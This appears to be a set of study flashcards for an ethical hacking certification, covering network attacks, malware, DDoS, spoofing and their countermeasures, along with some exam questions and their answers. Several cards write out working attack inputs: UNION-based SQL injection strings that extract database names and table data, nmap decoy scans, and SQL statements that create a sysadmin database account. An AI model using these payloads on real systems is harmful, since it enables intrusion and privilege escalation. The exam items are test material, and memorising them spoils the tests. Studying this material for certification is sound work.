DDoS Protection Hardware Tools Check Point DDoS Protector appliances block DDoS attacks with multi-layered protection. Benefits o Blocks a wide range of attacks with customized multi-layered protection o Fast response time—protects against attacks within seconds o Flexible deployment options to protect any business o Integrated with Check Point Security Management
Cisco Guard XT 5650
DDoS Protection Tools DDoS mitigation appliance from Cisco Systems. Based on unique multi-verification process (MVP) architecture, the Cisco Guard XT employs the most advanced anomaly recognition, source verification, and anti-spoofing technologies to identify and block individual attack flows while allowing legitimate transactions to pass. Benefits o Multistage verification o Multi-Gigabit performance o Multilevel monitoring and reporting
Platform-as-a-Service (PaaS)
DEVELOPERS This type of cloud computing service offers the platform for the development of applications and services. Subscribers need not to buy and manage the software and infrastructure underneath it but have authority over deployed applications and perhaps application hosting environment configurations. Offers development tools, configuration management, and development platforms on demand that can be used by subscribers to develop custom applications
Defend Against MAC Spoofing
DHCP Snooping Binding Table, -filters untrusted DHCP messages and helps to build and bind a DHCP binding table -It also helps in differentiating between trusted and untrusted interfaces Dynamic ARP Inspection, - The system checks the IP to MAC address binding for each ARP packet in a network. -the system will automatically drop invalid IP to MAC address bindings. IP Source Guard, -IP Source Guard is a security feature in switches that restricts the IP traffic on untrusted Layer 2 ports by filtering traffic based on the DHCP snooping binding database. -It prevents spoofing attacks when the attacker tries to spoof or use the IP address of another host. Encryption Retrieval of Mac address from NIC, Implementation of IEEE 802.1X suites: -It is a type of network protocol for port-based Network Access Control (PNAC), and its main purpose is to enforce access control at the point where a user joins the network. AAA (Authentication, Authorization and Accounting): -Use of AAA (Authentication, Authorization and Accounting) server mechanism in order to filter MAC addresses subsequently.
Restorator
Defacment tool A utility for editing Windows resources in applications and their components (e.g., files with .exe, .dll, .res, .rc, and .dcr extensions). It allows to change, add, or remove resources such as text, images, icons, sounds, videos, version, dialogs, and menus in almost all programs. Using this tool, one can perform translation/localization, customization, design improvement, and development. Features: -o Translate existing applications (localization) -o Customize the look and feel of programs -o Replace logos and icons (branding) -o Enhance control over resource files in the software development process -o Hack into the inner workings of applications on the computer
Modern Ciphers
Designed to withstand a wide range of attacks. Provide message secrecy, integrity, and authentication of the sender. The user can calculate this with the help of a one-way mathematical function that is capable of factoring large prime numbers. Types o Based on key used - Private key - Public key o Based on input -Block cipher -Stream Cipher
SQL Injection Black Box Pen Testing
Detecting SQL Injection Issues o Send single quotes and double quotes can be used as input data to finds where the user input is not sanitized Detecting Input Sanitization o Use right square bracket (the ] character) as the input data to catch instances where the user input is used as part of an SQL identifier without any input sanitization Detecting Truncation Issues o Send long strings of junk data, just as you would send strings to detect buffer overruns; this action might throw SQL errors on the page Detecting SQL Modification o Send long strings of single quote characters (or right square brackets or double quotes) o These max out the return values from REPLACE and QUOTEN
Aircrack-ng Suite
Detector, sniffer, WEP/WPA/WPA2PSK cracker runs under linux and windows o Airbase-ng: Captures WPA/WPA2 handshake and can act as an ad-hoc Access Point. o Aircrack-ng: Defacto WEP and WPA/ WPA2-PSK cracking tool. o Airdecap-ng: Decrypt WEP/WPA/ WPA2 and can be used to strip the wireless headers from Wi-Fi packets. o Airdecloak-ng: Removes WEP cloaking from a pcap file. o Airdriver-ng: Provides status information about the wireless drivers on your system. o Airdrop-ng: This program is used for targeted, rule-based de-authentication of users. o Aireplay-ng: Used for traffic generation, fake authentication, packet replay, and ARP request injection. o Airgraph-ng: Creates client to AP relationship and common probe graph from airodump file. o Airodump-ng: Used to capture packets of raw 802.11 frames and collect WEP IVs. o Airolib-ng: Store and manage essid and password lists used in WPA/ WPA2 cracking. o Airserv-ng: Allows multiple programs to independently use a Wi-Fi card via a client-server TCP connection. o Airmon-ng: Used to enable monitor mode on wireless interfaces from managed mode and vice versa. o Airtun-ng: Injects frames into a WPA TKIP network with QoS, and can recover MIC key and keystream from Wi-Fi traffic. o Easside-ng: Allows you to communicate via a WEP-encrypted access point (AP) without knowing the WEP key. o Packetforge-ng: Used to create encrypted packets that can subsequently be used for injection. o Tkiptun-ng: Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network. o Wesside-ng: Incorporates a number of techniques to seamlessly obtain a WEP key in minutes.
IP Address Spoofing Techniques
Direct TTL Probes - Check whether the TTL value in the reply matches that of the packet you are checking. -This technique is successful when the attacker is in a different subnet from that of the victim. IP Identification Number- The IPID increases incrementally each time a system sends a packet. The IPID value in the response packet must be close to, but slightly higher than the IPID value of the probe packet. The source address of the IP packet is spoofed if the IPID of the response packet is not close to that of the probe packet. -This method is effective even when both the attacker and the target are on the same subnet. TCP Flow Control Method-The user can control the flow of IP packets by the window size field in the TCP header. This field represents the maximum amount of data that the recipient can receive and the maximum amount of data that the sender can transmit without acknowledgement. Thus, this field helps us to control data flow. -The sender should stop sending data whenever the window size is set to zero.
SMB enumeration countermeasures
Disable it on Web and DNS servers Disable it on any internet-facing servers Disable ports TCP 139 and TCP 445
DNS enumeration countermeasures:
Disable the DNS zone transfers to the untrusted hosts Make sure that the private hosts and their IP addresses are not published into DNS zone files of public DNS server Use premium DNS registration services that hide sensitive information such as host information (HINFO) from public Use standard network admin contacts for DNS registrations in order to avoid social engineering attacks Prune DNS zone files to prevent revealing unnecessary information
Banner Grabbing Countermeasures
Disabling or Changing Banner Hiding File Extensions from Web Page
DoS: Disassociation & Deauthentication Attacks
Disassociation attack - the attacker makes the victim unavailable to other wireless devices by destroying the connectivity between the AP and client Deauthentication attack -the attacker floods station(s) with forged deauthenticates or disassociates to disconnect users from an AP.
Staganalysis
Discover & render covert messages Challenges: too many unknowns (encoding/encryption, decoys/noise, few or no indicators) pg 206
DNS
Domain Name System: -Ip gets transfered into a name -Each domain = namespace 53UDP = name lookup 53TCP = zone transfer
Zeus
E-banking Trojan one of the most successful and prolific banking trojans in the world. It steals data such as online credentials, banking details, etc. from infected computers via web browsers and protected storage. The Zbot trojan is typically distributed through spam email campaigns and drive-by downloads. uses a "fast flux" technique to evade detection Features: - Steals data submitted in HTTP forms - Steals account credentials stored in the Windows Protected Storage - Steals client-side X.509 public-key infrastructure (PKI) certificates - Steals FTP and POP account credentials - Steals/deletes HTTP and Flash cookies
CAM (Content Addressable Memory) table
Each Switch has a fixed-size CAM Table for MAC addresses (HW addresses) This is a dynamic table of fixed size. It stores information such as MAC addresses available on physical ports along with VLAN parameters associated with them. When a machine sends data to another machine in a network, the data passes through the switch. The switch searches for the destination MAC address (located in the Ethernet frame) in this table, and once the MAC address is found, it forwards data to the machine through the port with which the MAC address is bound. This method of transferring data in a switched network is more secure than that of a hub-based network, in which the hub forwards the incoming traffic to all the machines in the network
IoT Framework Security Considerations
Edge The main physical device in the IoT ecosystem that interacts with its surroundings and contains various components like sensors, actuators, operating systems, hardware and network and communication capabilities. Gateway This acts as a first step for an edge into the world of Internet as it connects the smart devices to the cloud components. I Cloud Platform This is referred to as the main central aggregation and data management point. Access to the cloud is restricted. Mobile This plays an important part particularly where the data needs to be collected and managed. Using mobile interfaces, users can access and interact with the edge in their home or workplace from miles away.
Countermeasures: Files and Directorie
Eliminate unnecessary files within the .jar files. Eliminate sensitive configuration information within the byte code. Avoid mapping virtual directories between two different servers, or over a network. Monitor and check all network services logs, website access logs, database server logs (e.g., Microsoft SQL Server, MySQL, and Oracle), and OS logs frequently. Disable serving of directory listings. Eliminate the presence of non-web files such as archive files, backup files, text files, and header/include files. Disable serving certain file types by creating a resource mapping. Ensure the presence of web application or website files and scripts on a separate partition or drive other than that of the OS, logs, and any other system files
Sniffing File Transfer Protocol (FTP)(20/21)
Enables clients to share files between computers in a network. This protocol fails to provide encryption; so attackers sniff data as well as user credentials by running tools like Cain & Abel
"concat(,)" operator
Eric, a professional hacker, is trying to perform a SQL injection attack on the back-end database system of the InfomationSEC, Inc. During the information gathering process, he identifies that MYSQL server is the back-end database engine used. Eric has tried various SQL injection attack attempts based on the information gathered but all of his attempts failed. Later, he discovered that IPS system is blocking all the SQL injection attack attempts. Eric decided to bypass the IPS using string concatenation IPS evasion technique where he needs to break the SQL query into a number of small pieces and concatenates the SQL query end-to-end. Which of the following string concatenation operator Eric need to use in the SQL query to concatenate the SQL query end-to-end? 1.) "concat(,)" operator 2.) "+" operator 3.) "&" operator 4.) "||" operator
More Integrity Attacks
Extensible AP Replay -Capturing 802.1X Extensible Authentication Protocols (e.g., EAP Identity, Success, and Failure) for later replay. -Methods/Tool -Wireless capture + injection tools between client and AP Data Replay -Capturing 802.11 data frames for later (modified) replay. -Methods/Tools - Capture + injection tools Initialization Vector Replay Attacks - Deriving the key stream by sending plain-text message. RADIUS Replay - Capturing RADIUS Access-Accept or Reject messages for later replay Viruses have a great impact on a wireless network. -Methods/tools -Ethernet capture + injection tools between AP and authentication server Wireless Network Viruses -Viruses can provide an attacker with a simple method to compromise APs.
Functions of SIEM
File Integrity Monitoring: Log Collection: Log Analysis Event Correlation: Log Forensics: IT Compliance and Reporting: Application Log Monitoring: SIEM Object Access Auditing Data Aggregation Real-time Alerting User Activity Monitoring: Dashboards: System and Device log monitoring Log Retention
File Extension Viruses
File extension viruses change the extensions of files. .txt is safe as it indicates a pure text file With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT If you forgotten that extensions are turned off, you might think this is a text file and open it Countermeasures - Turn off - Hide File Extension
Finding Default Credentials of Web Server
Finding this can gain access to the administrative interface compromising the respective web server and indeed allowing the attacker to exploit the main web application itself cirt.net -A is the lookup database for default passwords, credentials, and ports. open-sez.me fortypoundhead.com defaultpassword.us
Footprinting Tools: FOCA & Recon-Dog
Fingerprinting Organizations with Collected Archives - finds metadata & hidden info in documents it scans Recon Dog is an all in one tool that uses APIs to gather network info so your identity isn't compromised
The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall.
Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below TCP port 21—no response TCP port 22—no response TCP port 23—Time-to-live exceeded What conclusions can be drawn based on these scan results? -The lack of response from ports 21 and 22 indicate that those services are not running on the destination server. -The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error. -The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall. -The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.
The process involved in Distributed Reflection Denial of Service (DRDoS) attack
First, the attacker commands the intermediary victims (zombies) to send a stream of packets (TCP SYN) with the primary target's IP address as the source IP address to other noncompromised machines (secondary victims or reflectors) to exhort them to establish connection with the primary target. As a result, the reflectors send a huge volume of traffic (SYN/ACK) to the primary target to establish a new connection with it, as they believe it was the host that requested it. The primary target discards the SYN/ACK packets received from the reflectors, as they did not send the actual SYN packet The reflectors keep waiting for the acknowledgement (ACK) response from the primary target. Assuming that the packet lost its path, these bunches of reflector machines resend SYN/ACK packets to the primary target in an attempt to establish the connection, until time-out occurs. This way, a heavy volume of traffic is flooded onto the target machine with the available reflector machines. The combined bandwidth of these reflector machines overwhelms the target machine.
Mobile Spyware : FlexiSPY
FlexiSpy is the mobile monitoring software used to spy on mobile phones and tablets. It supports Android, iPhone, iPad, PC and Mac and it can silently monitor all communications, locations, and user behavior of a smartphone from any web browser. Features: o Spying On Instant Messages o Call Interception o SMS Tracker o Tap into the Room o Cell Phone Tracker o Spy On Mobile Phones o VoIP Call Recording o Spy Remotely
MAC Flooding
Flooding CAM Table with fake MAC & IP pairs until it's full, causing switch to broadcast everything out of confusion. This makes sniffing easy and effective. (macof for Linux/Unix) This makes use of this limitation to bombard switches with fake MAC addresses until the switches can no longer keep up. Once this happens to a switch, it will enter into the fail-open mode, wherein it starts acting as a hub by broadcasting packets to all the ports on the switch. Once that happens, it becomes easy to perform sniffing. Macof is a utility that comes with the dsniff suite and helps the attacker to perform MAC flooding.
Examples of types of DoS attacks
Flooding the victim's system with more traffic than can be handled Flooding a service (e.g., internet relay chat (IRC)) with more events than it can handle Crashing a transmission control protocol (TCP)/internet protocol (IP) stack by sending corrupt packet Crashing a service by interacting with it in an unexpected way Hanging a system by causing it to go into an infinite loop
Footprinting techniques
Footprinting through search engines Footprinting through web services Footprinting through social networking sites Website footprinting Email footprinting Competitive intelligence Whois footprinting DNS footprinting Network footprinting Footprinting through social enginee
Examples of Web Apps Vulnerable to SQL Injection
For example, the following text entered into the txtFilter textbox may reveal the names of the user tables in the database: The UNION statement in particular is useful to a hacker because it splices the results of one query into another UNION SELECT id, name, '', 0 FROM sysobjects WHERE xtype ='U' -- BadProductList.aspx CertifiedHackerShop.com
SQL Injection Vulnerability Detection
Function testing -a type of software testing technique, where a software or a system is tested against a set of inputs according to the end user's needs. Fuzzing Testing -It is an adaptive SQL injection testing technique used to discover coding errors by inputting massive amount of random data and observing the changes in the output. Static/Dynamic Testing -Analyzes web application source code
System Hacking Goals
Gain Access- Once attackers succeed in gaining access to the system, they are free to perform malicious activities such as stealing sensitive data, implementing a sniffer to capture network traffic, and infecting the system with malware. -At this stage, attackers use techniques such as password cracking and social engineering tactics to gain access to the target system. Escalating Privileges- After gaining access to a system using a low-privileged normal user account, attackers may then try to increase their administrator privileges to perform protected system operations, so that they can proceed to the next level of the system hacking phase: to execute applications. Attackers exploit known system vulnerabilities to escalate user privileges Executing apps-Once attackers have administrator privileges, they attempt to install malicious programs such as Trojans, Backdoors, Rootkits, and Keyloggers, which grant them remote system access, thereby enabling them to execute malicious codes remotely. -Installing Rootkits allows them to gain access at the operating system level to perform malicious activities. To maintain access for use at a later date, they may install Backdoors. Hiding files- root kits (Lives in Kernal below OS where anitvirus software doesn't scan), steganography -Attackers use Rootkits and steganography techniques to attempt to hide the malicious files they install on the system, and thus their activities. Covering tracks -To remain undetected, it is important for attackers to erase all evidence of security compromise from the system. To achieve this, they might modify or delete logs in the system using certain log-wiping utilities, thus removing all evidence of their presence.
IP Address Decoy
Generating or manually specifying IP addresses of the decoys so that the IDS/Firewall cannot determine the actual IP address. - nmap -D RND:10 [target] Nmap automatically generates a random number of decoys for the scan and randomly positions the real IP address between the decoy IPs. -nmap -D decoy1,decoy2,decoy3,...,ME,... [target] Here, you have to separate each decoy IP's with commas (,) and you can optionally use the ME command in order to position your real IP in the decoy list.
TCP/UDP 3268
Global Catalog Service -Global Catalog allows one to locate objects from any domain without having to know the domain name.
Website Archive Searching
Going through archive.com(Wayback Machine), Google Cache to search old snapshots of current websites
Footprinting: Financial Services
Google finance - features business and enterprise headlines for many corporations, including their financial decisions and major news events Yahoo! Finance, TheStreet, MarketWatch
Bypass Firewall via HTTP Tunneling
HTTP Tunneling technology allows attackers to perform various internet tasks despite the restrictions imposed by firewalls. Many firewalls do not examine the payload of an HTTP packet to confirm that it is legitimate. Thus it is possible to tunnel traffic via TCP port 80. HTTPTunnel is a client/server application, the client application is htc, and the server is hts.
Mobile Pen Testing Toolkit
Hackode - is the hacker's toolbox. It is an application for penetration testers, ethical hackers, IT administrators, and cyber security professionals to perform different tasks such as reconnaissance, scanning for exploits, and so on.
Autonomous Propagation
Here the attacking host itself transfers the attack toolkit to the newly discovered vulnerable system, exactly at the time it breaks into that system.
DDoS Prevention Offerings from ISP or DDoS Service
Here, the ISP scrubs/cleans the traffic prior to allowing it to enter your Internet link. Since this service runs in the cloud, DDoS attack does not saturate your Internet links.
Hardware/Firmware Rootkit
Hides in hardware devices or platform firmware which is not inspected for code integrity rootkits use devices or platform firmware to create a persistent malware image in hardware, such as a hard drive, system BIOS, or network card. The rootkit hides in firmware as the users do not inspect it for code integrity. A firmware rootkit implies the use of creating a permanent delusion of rootkit malware.
Cover Medium - Folder Stego
Hiding files in a folder that don't appear to normal apps like Win Explorer pg 204
Cover Medium - Whitespace Stego
Hiding msg in ASCII text by adding whitespace to ends of lines. Use built-in encryption to make unreadable. Tool - SNOW
DoS/DDoS Attack Tools
High Orbit Ion Cannon (HOIC) -A network stress and DoS/DDoS attack application -designed to attack up to 256 target URLs simultaneously -t sends HTTP POST and GET requests at a computer that uses lulz inspired GUIs Low Orbit Ion Cannon (LOIC) -call it an application-based DOS attack as it mostly targets web applications -use LOIC on a target site to flood the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service of a particular host. HULK Thor's Hammer Metasploit Nmap Blackhat Hacking Tools DAVOSET Tsunami R-U-Dead-Yet UDP FLooder DLR_DoS Moihack Port-Flooder DDOSIM
DigiCert
Home and Consumer IoT Security Solutions protect private data and home networks while preventing unauthorized access using PKI-based security solutions for consumer IoT devices.
Bypass Firewall via External Systems
Home machine of employee Machine that does remote administration of target network Machine from company's network but located at different place Steps to be followed to bypass a firewall through external systems: 1. Legitimate user works with some external system to access the corporate network 2. Attacker sniffs the user traffic, steals the session ID and cookies 3. Attacker accesses the corporate network bypassing the firewall and gets Windows ID of the running Mozilla process on user's system 4. Attacker then issues an OpenURL() command to the found window 5. User's web browser is redirected to the attacker's Web server 6. The malicious codes embedded in the attacker's web page are downloaded and executed on the user's mach
Deflect Attacks
Honey pots -KFSensor -is a Windows-based honeypot IDS. It acts as a honeypot, designed to attract and detect hackers and worms by simulating vulnerable system services and Trojan -SSHHiPot -Artillery
Rootkits: How they work
Hooking- call file, import data section, replace part of code, export... Direct kernel object manipulation (DKOM) hides a process by unlinking it from proc list System hooking is a process of changing and replacing the original function pointer with the pointer provided by the rootkit in stealth mode. Inline function hooking is a technique where a rootkit changes some of the bytes of a function inside the core system DLLs (kernel32.dll and ntdll. dll), placing an instruction so that any process calls hit the rootkit first. Direct Kernel Object Manipulation (DKOM) rootkits are able to locate and manipulate the "system" process in kernel memory structures and patch it. This can also hide processes and ports, change privileges, and misguide the Windows event viewer without any problem by manipulating the list of active processes of the operating system, altering data inside the PROCESS IDENTIFIERS structures. It has an ability to obtain read/write access \Device\Physical Memory object. It hides a process by unlinking it from the process list
NetBIOS Enumeration Tools
Hyena Nsauditor Network Security Auditor NetScanTools Pro SoftPerfect Network Scanner SuperScan NetBIOS Enumerator Nbtscan IP Tools MegaPing
Proprietary Methodologies
IBM: Express penetration testing services from IBM Security Services help mid-market organizations quickly assess the security posture of their networks by safely identifying network vulnerabilities before they are exploited. McAfee Foundstone: McAfee Foundstone guides enterprises on the best ways to protect assets and maximize business goals through maintaining a strong security posture. EC-Council LPT: LPT methodology is an industry accepted comprehensive information system security auditing framewo
Port is closed
In ACK flag probe scanning, if the TTL of RST is greater than 64 what does it mean?
Target port is closed
In IDLE probe scanning, is the IPID from the zombie in the last step has incremented by 1 what does it mean?
open port
In IDLE probe scanning, is the IPID from the zombie in the last step has incremented by 2 what does it mean?
Peform Union SQL Injection
In UNION SQL injection, an attacker uses the UNION clause to concatenate a malicious query with the original query in order to retrieve results from the target database table. Extract Database Name *http://www.certifiedhacker.com/page.aspx?id=1 UNION SELECT ALL 1,DB_NAME,3,4-* [DB_NAME] Returned from the serve Extract Database Tables http://www.certifiedhacker.com/page.aspx?id=1 *UNION SELECT ALL 1,TABLE_NAME,3,4 from sysobjects where xtype=char(85)--* [EMPLOYEE_TABLE] Returned from the server Extract Table Column Names *( http://www.certifiedhacker.com/page.aspx?id=1 UNION SELECT ALL 1,column_name,3,4 from DB_NAME.information_schema.columns where table_name ='EMPLOYEE_TABLE'--[EMPLOYEE_NAME] Extract 1st Field Data *( http://www.certifiedhacker.com/page.aspx?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from EMPLOYEE_NAME -- )* [FIELD 1 VALUE] Returned from the server
Access Token Manipulation
In Windows operating system, tokens are used to determine the security context of a process or thread. -user can modify these so that the process seems to belong to some other user than the user who started this process.
Working of E-banking TRojans
Includes Tan Grabber -Trojan intercepts valid Transaction Authentication Number (TAN - a single use password) transaction authentication number entered by a user -It replaces the TAN with a random number that will be rejected by the bank -Attacker can misuse the intercepted TAN with the user's login details HTML Injection: -Trojan creates fake form fields on e-banking pages. The attacker collects the target's account details, credit card number, date of birth, etc. Form Grabber: -a type of malware that captures a target's sensitive data such as IDs, passwords, and so on from a web browser form or page. It is an advanced method to collect the target's Internet banking information. -analyses POST requests and responses to victim's browser. It compromises the scramble pad authentication and intercepts scramble pad input as the user enters Customer Number and Personal Access Code. Covert Credential Grabber: -covertly to replicate itself on the computer and edit registry entries each time the computer is started -searches the cookie files that had been stored on the computer while browsing financial websites
Internet DNS Spoofing
Infect target's machine with Trojan and change their DNS IP address to that of the attacker. Also known as remote DNS poisoning. The attacker replaces the victim's DNS IP address with the fake IP address that resolves to the attacker's system. Thus, the victim's traffic redirects to the attacker's system. At this point, the attacker can easily sniff the victim's confidential information
Proxy Server DNS Poisoning
Infect target's machine with Trojan and change their proxy server settings in IE to that of the attacker's, and they are directed to a fake website. After the attacker collects information victim is redirected to the original site The attacker also configures a fraudulent DNS and makes its IP address a primary DNS entry in the proxy server.
Phases of a Virus
Infection Phase -o A file virus infects by attaching itself to an executable system application program. Potential targets for virus infections: -o Boot sector viruses execute their code in the first place before the target PC is booted. Attack Phase -o Viruses execute upon triggering specific events -o Some viruses execute and corrupt via built-in bug programs after being stored in the host's memory. -o The latest and advanced viruses conceal their presence, attacking only after thoroughly spreading in the host
File Viruses
Infects files which are executed or interpreted in the system such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files File viruses can be either direct-action or memory resident hides their presence by using stealth techniques to reside in a computer's memory in the same way as the system sector viruses work. It does not show any increase in file length while performing directory listing. If a user attempts to read the file, the virus intercepts the request, and the user gets back his original file
IANA
Internet Assigned Numbers Authority: Precursor to ICANN (Internet Corporation for Assigned Names and Numbers)
UDP 500
Internet Security Association and Key Management (ISAKMP), Internet Key Exchange (IKE) -the protocol used to set up a security association (SA) in the IPsec protocol suite. -Used to negotiate, modify and delete Security Associations (SA) and cryptographic keys in a VPN environment.
DNS Poisoning Techniques
Intranet DNS Spoofing Internet DNS Spoofing Proxy Server DNS Poisoning DNS Cache Poisoning
ARP Spoofing Attack
Involves constructing a large number of forged ARP request and reply packets to overload a switch. The ARP cache of the target machine will have a wrong entry for the gateway. In this way, all the traffic destined to pass through the gateway will now pass through the machine that spoofed the gateway MAC address. This is an intermediary to perform attacks such as DoS, MITM, and Session Hijacking.
Malvertising
Involves embedding malware-laden advertisements in legitimate online advertising channels to spread malware onto the systems of unsuspecting users.
Anonymizers
Is an intermediate server placed between you as the end user and the website to accesses the website on your behalf and make your web surfing untraceable. A -A networked anonymizer - first transfers your information through a network of Internet-connected computers before passing it on to the website. -Single-point anonymizers - first transfer your information through a website before sending it to the target website
More about Firewalls
Is an intrusion detection mechanism that is designed by each organization's security policy. Can be configure to restrict incoming traffic to POP and SMTP and to enable email access. Certain firewalls block specific email services to secure against spam. Can configure to check inbound traffic at a "checkpoint," where a security audit is performed. It can also act as an active "phone tap" tool for identifying an intruder's attempt to dial into modems in a secured network.
Spyware
Is stealthy computer monitoring software that allows you to secretly record all the user activities on the target computer. Spyware Propagation -the installation of spyware is done without user knowledge or consent, and can be accomplished by "piggybacking" the spyware onto other applications. Spytech- monitors everything on the computer Power Spy- monitors and records pg 188
Acknowledgement alias "ACK"
It confirms the receipt of transmission and identifies next expected sequence number. When the system successfully receives a packet, it sets the value of its flag to "1,"
Set login password retry lockout.
Jamie is an on-call security analyst. He had a contract to improve security for the company's firewall. Jamie focused specifically on some of the items on the security of the Company's firewall. After working for some time on the items, Jamie creates the following list to fix them: 1. Set ssh timeout to 30 minutes. 2. Set telnet timeout to 30 minutes. 3. Set console timeout to 30 minutes. 4. Set login password retry lockout. Which task should Jamie perform if he has time for just one change before leaving the organization? -Set console timeout to 30 minutes. -Set ssh timeout to 30 minutes. -Set login password retry lockout. -Set telnet timeout to 30 minutes.
LLMNR/NBT-NS Poisoning
LLMNR (Link Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows operating systems used in order to perform name resolution for hosts present on the same link Asks to if anyone has this name but its unencrypted so a hacker can say its them and get the hash information Crack the NTLMv2 hash obtained from victim's authentication process and use extracted credentials to log on to the host system. Tools -Responder It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffixthe tool only responds to a File Server Service request, which is for SMB. -Metasploit -NBNSPoof -Inveigh
Long-range communication : Low Power Wide Area Networking
LPWAN is a type of wireless telecommunication network, designed in such a way so as to provide long-range communications between two end points. Technology and protocols o loRa WAN o Sigfox o Neul
More Vulnerability solution
Lack of Transport Encryption / Integrity Verification o Encrypt communication between endpoints o Maintain SSL/TLS implementations o Not to use propriety encryption solutions Privacy Concern o Minimize data collection o Anonymize collected data o Providing end users the ability to decide what data is collected Poor Physical Security o Minimize external ports such as USB ports o Protect operating system o Include ability to limit administrative capabilities
Mitigate Attacks
Load Balancing -Bandwidth providers can increase their bandwidth on the critical connections in case of a DDoS attack to prevent their servers from going down Throttling -Throttling helps in preventing damage to servers by controlling the DoS traffic. -This method helps routers manage heavy incoming traffic, so that the server can handle it. It filters legitimate user traffic from fake DDoS attack traffic. Drop Request -Another method is to drop packets when a load increases; usually the router or server does it.
Working of Vulnerability Scanning Solutions
Locating nodes: The first step in vulnerability scanning is to locate live hosts in the target network using various scanning techniques. Performing service discovery on them: After detecting live hosts in the target network, the next step is to enumerate open ports and services on the target systems. Testing those services for known vulnerabilities: Finally, after identifying open services, these services are tested for known vulnerabilities
Organizational Networks IDS systems
Log File Monitoring -monitors log files created by network services. The LFM IDS searches through the logs and identifies malicious events. -In a similar manner to NIDS, these systems look for patterns in the log files that suggest an intrusion. File Integrity Checking -These mechanisms check for Trojan horses, or modified files, indicating the presence of an intruder. Tripwire is an example of a file integrity checking tool.
Wi-Fi Jamming Devices
MGT-P1B Wi-Fi Jammer o 6-8 meters,Internal antennas, 1 frequency bands, Portable MGT-P6 Wi-Fi Jammer o 10-12 meters ,4 antennas and jammers MGT-615 Jammer o 5-100 meters, 6 antennas and 6 Blurred frequency bands, Wall mountable MGT-04 Wi-Fi Jammer, MGT-06B Jammer, MGT-08 Jammer
Man-in-the-Middle (MITM) & Replay Atk
MITM- accessing comm channel beetween victim & server Replay- capture packets & authentication tokens via sniffer and use them in same net for access. Interprets information between two parties without ther knowledge
SMTP Enumeration
Mail systems commonly use SMTP with POP3 and IMAP that enables users to save the messages in the server mailbox and download them occasionally from the server. SMTP uses Mail Exchange (MX) servers to direct the mail via DNS.
whois
Maintained by Regional Internet Registries. DNS details, contact info, NetRange, Domain age,Expiry records, Records last update, network map Assist hackers in gathering personal info for social engineering, create network map, obtain details of target network
Countermeasures to Defend Against SQL Injection
Make no assumptions about the size, type, or content of the data that is received by your application Test the size and data type of input and enforce appropriate limits to prevent buffer overruns Test the content of string variables and accept only expected values Reject entries that contain binary data, escape sequences, and comment characters Never build Transact-SQL statements directly from user input and use stored procedures to validate user input Implement multiple layers of validation and never concatenate user input that is not validated Avoid constructing dynamic SQL with concatenated input values Ensure that the Web config files for each application do not contain sensitive information Use most restrictive SQL account types for applications Use Network, host, and application intrusion detection systems to monitor the injection attack
Type of Insider Threats
Malicious Insider - come from disgruntled or terminated employees who steal data or destroy company networks intentionally by injecting malware into the corporate network. Negligent Insider -Insiders, who are uneducated on potential security threats or simply bypass general security procedures to meet workplace efficiency, are more vulnerable to social engineering attacks. A large number of insider attacks result from employee's laxity towards security measures, policies, and practices. Professional Insider -Most harmful insiders where they use their technical knowledge to identify weaknesses and vulnerabilities of the company's network and sell the confidential information to the competitors or black market bidders. Compromised Insider -An outsider compromises insiders having access to critical assets or computing devices of an organization.( difficult to detect)
Dynamic Malware Analysis - Device Drivers Monitoring
Malware installed along with the device drivers downloaded from untrusted sources and they use these drivers as a shield to avoid detection Use this to scan for suspicious device drivers and to verify if the device drivers are genuine and downloaded form the publisher's original site Go to RUN> msinfo32 > software environment> system drivers to m anually check for installed drivers Tools: Driver View
Dynamic Malware Analysis - Files and Folder Monitoring
Malware normally modify system's files and folders after infecting a computer Use this to detect changes in system files and folders Tools - like SIGVERIF, Tripwire and Netwrix Auditor
Dynamic Malware Analysis
Malware will be executed on a system to understand its behavior after infection This type of analysis requires safe environment such as virtual machines and sandboxes to deter the spreading of malware Consists of two stages: System Base lining and Host Integrity Monitoring
what is MIB in SNMP?
Management Information Database -containing formal descriptions of all the network objects being managed by SNMP Microsoft provides the list of MIBs that are installed with the SNMP Service in the Windows resource kit The major ones are: DHCP.MIB: Monitors network traffic between DHCP servers and remote hosts HOSTMIB.MIB: Monitors and manages host resources LNMIB2.MIB: Contains object types for workstation and server services WINS.MIB: For Windows Internet Name Service
SPECTER
Manav wants to simulate a complete system and provide an appealing target to push hackers away from the production systems of his organization. By using some honeypot detection tool, he offers typical Internet services such as SMTP, FTP, POP3, HTTP, and TELNET, which appear perfectly normal to attackers. However, it is a trap for an attacker by messing them so that he leaves some traces knowing that they had connected to a decoy system that does none of the things it appears to do; but instead, it logs everything and notifies the appropriate people. Can you identify the tool? -PeerBlock -Glasswire -SPECTER -TinyWall
Default Passwords
Manufacturers provide default passwords to the users to access the device during initial set-up and users need to change the passwords for future use. Passwords should be kept secret; failing to protect the confidentiality of a password allows the system to be compromised with ease.
String concatenation
Michel, a professional hacker, is trying to perform an SQL injection attack on the MS SQL database system of the CityInfo, Inc. by bypassing the signature-based IDS. He tried various IDS evasion techniques and finally succeeded with one where he breaks the SQL query into a number of small pieces and uses the + sign to join SQL query end to end.Which of the following IDS evasion techniques he uses to bypass the signature-based IDS? -URL encoding -String concatenation -Hex encoding -Char encoding
Creating DB Accounts
Microsoft SQL Server -exec sp_addlogin 'victor', 'Pass123' exec sp_addsrvrolemember 'victor', 'sysadmin' Oracle -CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp Microsoft Access -CREATE USER victor IDENTIFIED BY 'Pass123' MySQL -INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123')
Resources for Vuln Research
